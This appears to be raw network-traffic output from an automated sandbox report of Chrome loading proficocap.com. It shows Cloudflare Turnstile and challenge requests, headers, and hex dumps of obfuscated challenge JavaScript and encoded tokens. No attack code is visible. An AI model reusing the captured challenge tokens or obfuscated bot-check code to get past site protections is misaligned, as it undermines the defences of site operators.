                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4f 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 67 4f 28 36 39 31 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 64 5b 67 4f 28 31 31 38 38 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 4f 28 39 30 31 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 64 5b 67 4f 28 31 32 39 32 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 67 4f 28 33 34 38 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 4f 28 36 35 35 29 5d 28 30 3c 4e 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4f 3d 4a 29 7b 63 61 73 65 20 30 3a 66
                                                                          Data Ascii: )](0<N?1:0,F),F<<=1);O=e(J);break;case 2:return''}for(E=s[3]=O,D[gO(691)](O);;){if(d[gO(1188)](I,i))return'';for(J=0,K=Math[gO(901)](2,C),F=1;d[gO(1292)](F,K);N=G&H,H>>=1,0==H&&(H=j,G=d[gO(348)](o,I++)),J|=d[gO(655)](0<N?1:0,F),F<<=1);switch(O=J){case 0:f
                                                                          2024-12-08 19:50:31 UTC1369INData Raw: 3d 66 6e 28 68 29 2c 67 5b 68 75 28 37 33 35 29 5d 5b 68 75 28 31 30 35 38 29 5d 26 26 28 78 3d 78 5b 68 75 28 36 31 32 29 5d 28 67 5b 68 75 28 37 33 35 29 5d 5b 68 75 28 31 30 35 38 29 5d 28 68 29 29 29 2c 78 3d 67 5b 68 75 28 31 32 34 38 29 5d 5b 68 75 28 31 30 37 31 29 5d 26 26 67 5b 68 75 28 31 31 36 33 29 5d 3f 67 5b 68 75 28 31 32 34 38 29 5d 5b 68 75 28 31 30 37 31 29 5d 28 6e 65 77 20 67 5b 28 68 75 28 31 31 36 33 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 77 2c 48 29 7b 66 6f 72 28 68 77 3d 68 75 2c 47 5b 68 77 28 31 31 39 37 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 77 28 33 39 32 29 5d 28 48 2c 47 5b 68 77 28 35 33 34 29 5d 29 3b 6f 5b 68 77 28 33 31 39 29 5d 28 47 5b 48 5d 2c 47 5b 48 2b 31 5d 29 3f 47 5b 68 77 28 39 31 38 29 5d 28
                                                                          Data Ascii: =fn(h),g[hu(735)][hu(1058)]&&(x=x[hu(612)](g[hu(735)][hu(1058)](h))),x=g[hu(1248)][hu(1071)]&&g[hu(1163)]?g[hu(1248)][hu(1071)](new g[(hu(1163))](x)):function(G,hw,H){for(hw=hu,G[hw(1197)](),H=0;o[hw(392)](H,G[hw(534)]);o[hw(319)](G[H],G[H+1])?G[hw(918)](


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.449758104.18.95.414431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:33 UTC582OUTGET /turnstile/v0/g/f9063374b04d/api.js?onload=fjGVd3&render=explicit HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://proficocap.com
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: script
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:33 UTC471INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:33 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47692
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef48fd7a796a5f-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-12-08 19:50:33 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                          2024-12-08 19:50:33 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                          2024-12-08 19:50:33 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                          2024-12-08 19:50:33 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                          2024-12-08 19:50:33 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                          2024-12-08 19:50:33 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                          Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                          2024-12-08 19:50:33 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                          Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                          2024-12-08 19:50:34 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                          Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                          2024-12-08 19:50:34 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                          Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                          2024-12-08 19:50:34 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                          Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.449761104.21.53.1714431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:50:34 UTC1302OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2103902929:1733530456:gWlw6UrWrF1EVwazpOoHDdN2NPkECb29gam9UES4p7M/8eef48dc28b04405/Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 4219
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-arch: "x86"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-full-version: "117.0.5938.132"
                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                          CF-Chl-RetryAttempt: 0
                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                          sec-ch-ua-bitness: "64"
                                                                          sec-ch-ua-model: ""
                                                                          CF-Challenge: Lyh2pldR2U_E_.MUR82KipgfyzNT77WVEZwHtUhweWU-1733687428-1.2.1.1-G7.NbYDLguhv11ABpOVb3tBc0A56ETChg8iDEU7elt4XUzrkd1lpQ9Ezh8w9c7jA
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://proficocap.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://proficocap.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:50:34 UTC4219OUTData Raw: 76 5f 38 65 65 66 34 38 64 63 32 38 62 30 34 34 30 35 3d 32 56 5a 34 49 34 75 34 31 34 73 34 36 34 37 38 35 47 38 35 72 30 5a 57 49 25 32 62 54 75 54 44 31 35 6c 45 35 49 67 34 41 78 35 4c 34 69 56 35 55 35 24 44 45 35 54 78 77 34 49 45 35 6a 34 54 56 35 63 42 35 4c 38 67 35 39 54 6f 35 49 63 54 35 44 5a 35 63 69 72 6b 70 45 2b 35 57 30 49 65 36 51 35 5a 44 2b 35 58 34 44 61 72 42 4b 2d 33 39 41 35 49 45 6a 44 78 74 35 41 59 41 73 35 55 46 50 77 50 75 4a 67 35 2b 30 71 62 48 4f 44 62 44 33 72 69 51 54 31 4b 6a 61 6d 69 35 73 72 61 71 69 73 56 35 47 36 30 70 6b 74 67 41 41 39 51 31 39 24 54 69 37 6e 59 50 32 74 79 55 61 67 41 75 51 6c 35 79 68 35 35 51 37 30 69 59 35 44 74 7a 35 41 61 45 2b 30 35 71 67 34 41 6c 54 49 54 65 55 67 41 41 35 75 74 6b 68 42 79
                                                                          Data Ascii: v_8eef48dc28b04405=2VZ4I4u414s464785G85r0ZWI%2bTuTD15lE5Ig4Ax5L4iV5U5$DE5Txw4IE5j4TV5cB5L8g59To5IcT5DZ5cirkpE+5W0Ie6Q5ZD+5X4DarBK-39A5IEjDxt5AYAs5UFPwPuJg5+0qbHODbD3riQT1Kjami5sraqisV5G60pktgAA9Q19$Ti7nYP2tyUagAuQl5yh55Q70iY5Dtz5AaE+05qg4AlTITeUgAA5utkhBy
                                                                          2024-12-08 19:50:35 UTC871INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:50:34 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 13568
                                                                          Connection: close
                                                                          cf-chl-gen: QEyxbCMjw4kxldVHcfRfd7c7NN9mHYqwXd4pNO1ZfnVJiWF7jseS4EJ+DoGeXjGQaUuLageksV0=$fW9SQ10qxUdyijGk
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CZV%2FNQ1UTaaozpEfHOlm%2BN8AdBmBYeO1QVu3nvtPqid2TwrNPqVThWk8Zg51grnfH5tLiFgqmtkV27vVfIx%2B8X2GpbBtGUsCDfjz%2FZG2ak3R3fcp3W1RKgJiKRbr1sgL2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eef4903a8a5efa9-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4096&min_rtt=1841&rtt_var=2221&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2832&recv_bytes=6143&delivery_rate=1586094&cwnd=127&unsent_bytes=0&cid=41d7ee50581ecf73&ts=447&x=0"
                                                                          2024-12-08 19:50:35 UTC498INData Raw: 76 72 47 33 72 72 72 44 65 36 32 4d 74 73 62 41 74 73 69 2b 78 63 57 41 67 74 58 59 6c 33 33 56 79 4d 37 46 30 64 71 53 78 4d 47 58 78 61 61 52 7a 4a 4f 6f 6a 75 62 5a 33 39 62 69 36 36 50 56 30 71 6e 57 74 36 4c 65 70 4c 6d 66 6f 4b 47 69 2b 65 58 33 70 75 62 72 37 2b 6e 75 39 50 6e 74 38 67 55 4b 73 74 43 30 39 67 6e 2b 44 67 63 41 43 68 45 52 2b 63 2f 39 33 4b 7a 44 78 4d 58 47 48 67 6f 63 79 68 38 53 48 42 4d 43 46 69 4d 6f 47 53 67 71 31 76 54 59 47 79 30 6a 4d 69 73 6b 4c 6a 55 31 48 76 51 69 41 64 44 52 36 4f 6e 71 36 7a 59 30 37 76 63 77 4e 54 6b 7a 4f 44 35 44 4e 7a 78 4f 55 77 6f 6b 4b 56 4a 4d 54 52 4d 44 49 53 49 6a 42 78 67 53 43 6d 62 31 39 67 34 50 45 42 45 53 45 78 51 56 56 56 70 65 57 46 31 6a 61 46 78 68 63 33 67 68 50 79 4e 2f 44 79 59
                                                                          Data Ascii: vrG3rrrDe62MtsbAtsi+xcWAgtXYl33VyM7F0dqSxMGXxaaRzJOojubZ39bi66PV0qnWt6LepLmfoKGi+eX3pubr7+nu9Pnt8gUKstC09gn+DgcAChER+c/93KzDxMXGHgocyh8SHBMCFiMoGSgq1vTYGy0jMiskLjU1HvQiAdDR6Onq6zY07vcwNTkzOD5DNzxOUwokKVJMTRMDISIjBxgSCmb19g4PEBESExQVVVpeWF1jaFxhc3ghPyN/DyY
                                                                          2024-12-08 19:50:35 UTC1369INData Raw: 33 65 33 2b 44 68 34 75 50 6b 4d 6a 59 32 4c 43 45 43 42 75 78 46 4f 44 34 31 51 55 6f 43 4e 44 6b 39 4e 7a 78 43 52 7a 74 4d 54 6c 4d 4f 49 30 6f 79 4d 44 4d 61 42 78 55 4a 59 56 52 61 55 56 31 6d 48 6c 42 56 57 56 4e 59 58 6d 4e 58 61 47 70 76 4b 6c 4a 42 64 30 55 32 4c 67 30 6b 4a 53 59 6e 4b 43 6b 71 4b 79 77 74 4c 69 39 79 61 57 4f 49 53 6b 38 32 6a 6f 47 48 66 6f 71 54 53 33 32 43 68 6f 43 46 69 35 43 45 6c 5a 65 63 56 33 36 42 68 59 4a 69 54 31 31 52 71 5a 79 69 6d 61 57 75 5a 70 69 64 6f 5a 75 67 70 71 75 66 73 4c 4b 33 63 72 6d 74 69 38 42 39 64 6c 56 73 62 57 35 76 63 48 46 79 63 33 52 31 64 6e 66 45 73 38 69 73 6a 35 64 2b 31 73 6e 50 78 74 4c 62 6b 38 58 4b 7a 73 6a 4e 30 39 6a 4d 33 64 2f 6b 6e 39 57 38 79 4e 37 6a 33 4d 75 6c 68 4a 75 63 6e
                                                                          Data Ascii: 3e3+Dh4uPkMjY2LCECBuxFOD41QUoCNDk9NzxCRztMTlMOI0oyMDMaBxUJYVRaUV1mHlBVWVNYXmNXaGpvKlJBd0U2Lg0kJSYnKCkqKywtLi9yaWOISk82joGHfoqTS32ChoCFi5CElZecV36BhYJiT11RqZyimaWuZpidoZugpqufsLK3crmti8B9dlVsbW5vcHFyc3R1dnfEs8isj5d+1snPxtLbk8XKzsjN09jM3d/kn9W8yN7j3MulhJucn
